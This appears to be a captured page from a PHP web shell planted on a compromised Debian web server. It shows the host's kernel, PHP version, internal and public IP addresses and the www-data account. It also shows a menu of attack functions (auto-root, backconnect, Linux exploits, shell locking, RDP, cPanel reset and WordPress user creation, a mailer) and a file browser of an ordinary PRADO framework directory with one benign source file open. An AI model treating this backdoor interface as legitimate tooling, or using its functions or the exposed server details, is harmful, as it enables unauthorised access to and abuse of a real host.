Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.146.206.87
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
framework /
Web /
UI /
ActiveControls /
[ HOME SHELL ]
Name
Size
Permission
Action
TActiveButton.php
3.98
KB
-rw-r--r--
TActiveCheckBox.php
5.21
KB
-rw-r--r--
TActiveCheckBoxList.php
3.46
KB
-rw-r--r--
TActiveClientScript.php
2.52
KB
-rw-r--r--
TActiveControlAdapter.php
13.61
KB
-rw-r--r--
TActiveCustomValidator.php
7.29
KB
-rw-r--r--
TActiveDataGrid.php
28.01
KB
-rw-r--r--
TActiveDataList.php
3.74
KB
-rw-r--r--
TActiveDatePicker.php
6.11
KB
-rw-r--r--
TActiveDropDownList.php
4.21
KB
-rw-r--r--
TActiveFileUpload.php
15.53
KB
-rw-r--r--
TActiveHiddenField.php
3.44
KB
-rw-r--r--
TActiveHyperLink.php
3.12
KB
-rw-r--r--
TActiveImage.php
2.59
KB
-rw-r--r--
TActiveImageButton.php
5.09
KB
-rw-r--r--
TActiveLabel.php
2.55
KB
-rw-r--r--
TActiveLinkButton.php
4.7
KB
-rw-r--r--
TActiveListBox.php
4.53
KB
-rw-r--r--
TActiveListControlAdapter.php
6.53
KB
-rw-r--r--
TActiveMultiView.php
3.5
KB
-rw-r--r--
TActivePageAdapter.php
12.12
KB
-rw-r--r--
TActivePager.php
6.14
KB
-rw-r--r--
TActivePanel.php
2.74
KB
-rw-r--r--
TActiveRadioButton.php
5.18
KB
-rw-r--r--
TActiveRadioButtonList.php
3.57
KB
-rw-r--r--
TActiveRatingList.php
3.88
KB
-rw-r--r--
TActiveRepeater.php
3.67
KB
-rw-r--r--
TActiveTableCell.php
8.46
KB
-rw-r--r--
TActiveTableRow.php
9.03
KB
-rw-r--r--
TActiveTextBox.php
3.61
KB
-rw-r--r--
TAutoComplete.php
13.18
KB
-rw-r--r--
TBaseActiveControl.php
11.01
KB
-rw-r--r--
TCallback.php
3.01
KB
-rw-r--r--
TCallbackClientScript.php
21.4
KB
-rw-r--r--
TCallbackClientSide.php
8.44
KB
-rw-r--r--
TCallbackEventParameter.php
2.22
KB
-rw-r--r--
TCallbackOptions.php
1.31
KB
-rw-r--r--
TCallbackResponseAdapter.php
3.69
KB
-rw-r--r--
TDraggable.php
8.18
KB
-rw-r--r--
TDropContainer.php
9.48
KB
-rw-r--r--
TEventTriggeredCallback.php
2.43
KB
-rw-r--r--
TInPlaceTextBox.php
8.02
KB
-rw-r--r--
TTimeTriggeredCallback.php
3.49
KB
-rw-r--r--
TTriggeredCallback.php
1.68
KB
-rw-r--r--
TValueTriggeredCallback.php
3.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TActiveListControlAdapter.php
<?php /** * TActiveListControlAdapter class file. * * @author Wei Zhuo <weizhuo[at]gamil[dot]com> * @link http://www.pradosoft.com/ * @copyright Copyright © 2005-2014 PradoSoft * @license http://www.pradosoft.com/license/ * @package System.Web.UI.ActiveControls */ /** * Load active control adapter. */ Prado::using('System.Web.UI.ActiveControls.TActiveControlAdapter'); Prado::using('System.Web.UI.WebControls.TListControl'); /** * TActiveListControlAdapter class. * * Adapte the list controls to allows the selections on the client-side to be altered * during callback response. * * @author Wei Zhuo <weizhuo[at]gmail[dot]com> * @package System.Web.UI.ActiveControls * @since 3.1 */ class TActiveListControlAdapter extends TActiveControlAdapter implements IListControlAdapter { /** * @return boolean true if can update client-side attributes. */ protected function canUpdateClientSide() { return $this->getControl()->getActiveControl()->canUpdateClientSide(); } /** * Selects an item based on zero-base index on the client side. * @param integer the index (zero-based) of the item to be selected */ public function setSelectedIndex($index) { if($this->canUpdateClientSide()) { $this->updateListItems(); // if a prompt is set, we mimic the postback behaviour of not counting it // in the index. We assume the prompt is _always_ the first item (Issue #368) $promptValue=$this->getControl()->getPromptValue(); if($promptValue==='') $promptValue=$this->getControl()->getPromptText(); if($promptValue!=='') $index++; if($index >= 0 && $index <= $this->getControl()->getItemCount()) $this->getPage()->getCallbackClient()->select( $this->getControl(), 'Index', $index); } } /** * Selects a list of item based on zero-base indices on the client side. * @param array list of index of items to be selected */ public function setSelectedIndices($indices) { if($this->canUpdateClientSide()) { $this->updateListItems(); $n = $this->getControl()->getItemCount(); $promptValue=$this->getControl()->getPromptValue(); if($promptValue==='') $promptValue=$this->getControl()->getPromptText(); $list = array(); foreach($indices as $index) { $index = intval($index); if($promptValue!=='') $index++; if($index >= 0 && $index <= $n) $list[] = $index; } if(count($list) > 0) $this->getPage()->getCallbackClient()->select( $this->getControl(), 'Indices', $list); } } /** * Sets selection by item value on the client side. * @param string the value of the item to be selected. */ public function setSelectedValue($value) { if($this->canUpdateClientSide()) { $this->updateListItems(); $this->getPage()->getCallbackClient()->select( $this->getControl(), 'Value', $value); } } /** * Sets selection by a list of item values on the client side. * @param array list of the selected item values */ public function setSelectedValues($values) { if($this->canUpdateClientSide()) { $this->updateListItems(); $list = array(); foreach($values as $value) $list[] = $value; if(count($list) > 0) $this->getPage()->getCallbackClient()->select( $this->getControl(), 'Values', $list); } } /** * Clears all existing selections on the client side. */ public function clearSelection() { if($this->canUpdateClientSide()) { $this->updateListItems(); if($this->getControl() instanceof TActiveDropDownList) { // clearing a TActiveDropDownList's selection actually doesn't select the first item; // we mimic the postback behaviour selecting it (Issue #368) $this->getPage()->getCallbackClient()->select($this->getControl(), 'Index', 0); } else { $this->getPage()->getCallbackClient()->select($this->getControl(), 'Clear'); } } } /** * Update the client-side list options. */ public function updateListItems() { if($this->canUpdateClientSide()) { $items = $this->getControl()->getItems(); if($items instanceof TActiveListItemCollection && $items->getListHasChanged()) { $items->updateClientSide(); } } } } /** * TActiveListItemCollection class. * * Allows TActiveDropDownList and TActiveListBox to add new options * during callback response. New options can only be added <b>after</b> the * {@link TControl::onLoad OnLoad} event. * * The {@link getListHasChanged ListHasChanged} property is true when the * list items has changed. The control responsible for the list needs to * repopulate the client-side options. * * @author Wei Zhuo <weizhuo[at]gmail[dot]com> * @package System.Web.UI.ActiveControls * @since 3.1 */ class TActiveListItemCollection extends TListItemCollection { /** * @var IActiveControl control instance. */ private $_control; /** * @var boolean true if list items were changed. */ private $_hasChanged=false; /** * @return boolean true if active controls can update client-side and * the onLoad event has already been raised. */ protected function canUpdateClientSide() { return $this->getControl()->getActiveControl()->canUpdateClientSide() && $this->getControl()->getHasLoaded(); } /** * @param IActiveControl a active list control. */ public function setControl(IActiveControl $control) { $this->_control = $control; } /** * @return IActiveControl active control using the collection. */ public function getControl() { return $this->_control; } /** * @return boolean true if the list has changed after onLoad event. */ public function getListHasChanged() { return $this->_hasChanged; } /** * Update client-side list items. */ public function updateClientSide() { $client = $this->getControl()->getPage()->getCallbackClient(); $client->setListItems($this->getControl(), $this); $this->_hasChanged=false; } /** * Inserts an item into the collection. * The new option is added on the client-side during callback. * @param integer the location where the item will be inserted. * The current item at the place and the following ones will be moved backward. * @param TListItem the item to be inserted. * @throws TInvalidDataTypeException if the item being inserted is neither a string nor TListItem */ public function insertAt($index, $value) { parent::insertAt($index, $value); if($this->canUpdateClientSide()) $this->_hasChanged = true; } /** * Removes an item from at specified index. * @param int zero based index. */ public function removeAt($index) { parent::removeAt($index); if($this->canUpdateClientSide()) $this->_hasChanged = true; } }
Close